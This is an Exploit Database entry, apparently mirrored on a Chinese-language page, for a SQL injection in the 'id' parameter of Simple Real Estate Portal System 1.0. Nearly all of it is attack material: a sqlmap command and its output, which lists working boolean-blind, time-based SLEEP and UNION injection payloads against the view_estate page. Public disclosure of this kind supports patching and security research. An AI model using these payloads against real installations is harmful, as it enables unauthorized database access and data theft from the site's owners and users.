Simple Real Estate Portal System 1.0 – ‘id’ SQLi

• Exploit Database
• 64 阅读

• 作者： Mosaaed
  日期： 2022-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50778/

• # Exploit Title: Simple Real Estate Portal System 1.0 - 'id'SQL Injection
  # Date: 22/02/2022
  # Exploit Author: Mosaaed
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
  # Version: 1.0
  # Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
  
  
  
  # Sqlmap command:
  
  sqlmap -u "http://localhost/reps/?p=view_estate&id=6"--batch --dbs
  
  # Output:
  
  Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 9 columns
  Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -